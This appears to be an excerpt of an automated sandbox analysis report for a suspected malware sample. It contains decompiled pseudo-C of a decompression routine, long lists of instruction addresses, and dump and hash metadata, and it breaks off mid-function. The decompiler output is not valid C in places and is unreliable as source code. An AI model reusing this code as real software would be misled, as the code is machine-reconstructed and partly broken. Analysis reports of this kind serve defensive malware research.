												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00407194
0x00407194
0x00407194
0x00407194
0x0040719a
0x0040719e
0x004071a2
0x004071ac
0x004071ba
0x00407490
0x00407490
0x00407493
0x0040749a
0x004074c7
0x004074c7
0x004074cb
0x00000000
0x00000000
0x004074cd
0x004074d6
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074ee
0x00407507
0x0040750a
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074ff
0x00407502
0x00407502
0x00407524
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074cb
0x00000000
0x00000000
0x00000000
0x00407526
0x00407526
0x0040749f
0x004074a3
0x004075db
0x004075db
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x004074a9
0x004074af
0x004074b6
0x004074be
0x004074be
0x004074c1
0x00000000
0x004074c1
0x0040752b
0x00407538
0x0040753b
0x00407447
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00406bf2
0x00000000
0x00406bf9
0x00406bfd
0x00000000
0x00000000
0x00406c03
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c5e
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x0040754e
0x00000000
0x0040754e
0x00406ca8
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd2
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x0040755d
0x00000000
0x0040755d
0x00406d18
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x004075cf
0x00000000
0x004075cf
0x00407426
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00407447
0x00407447
0x00000000
0x00000000
0x00406d5f
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x00000000
0x00406dec
0x00406d66
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00406ffe
0x00407002
0x00407020
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x0040711c
0x00407120
0x00407127
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00407122
0x00000000
0x00000000
0x00407143
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00000000
0x00000000
0x00407395
0x00407395
0x00407399
0x004073bb
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x0040739b
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00407490
0x00407493
0x0040749a
0x00000000
0x0040749d
0x00407458
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407543
0x00407546
0x00407447
0x00407447
0x00407447
0x00000000
0x0040744d
0x00000000
0x0040717d
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x0040749d
0x00000000
0x00000000
0x00000000
0x004071c2
0x004071c2
0x004071c5
0x004071fb
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x004075bd
0x00000000
0x004075bd
0x00407339
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725b
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004074c7
0x00407490

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
